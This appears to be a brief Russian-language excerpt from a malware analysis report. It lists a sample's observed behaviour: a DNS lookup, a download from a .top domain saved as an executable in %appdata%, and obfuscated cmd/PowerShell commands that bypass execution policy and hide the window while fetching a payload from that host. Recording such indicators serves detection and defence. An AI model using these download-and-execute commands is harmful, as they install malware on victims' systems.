Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWe^rsh^ELL.eXe -Exe^CutIonP^OL^ICY^ ^b^ypa^SS -n^OP^ROF^I^LE ^-WIN^d^OWSTy^L^E HIddE^N ^(nEW-OBjE^CT sys^TEm.NET.^Web^CL^i^E^nT).^DO^wNloA^D^fILe('http://zonexxopera.top/read.p...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /c "poWe^rsh^ELL.eXe -Exe^CutIonP^OL^ICY^ ^b^ypa^SS -n^OP^ROF^I^LE ^-WIN^d^OWSTy^L^E HIddE^N ^(nEW-OBjE^CT sys^TEm.NET.^Web^CL^i^E^nT).^DO^wNloA^D^fILe('http://zonexxopera.top/read.p...' (со скрытым окном)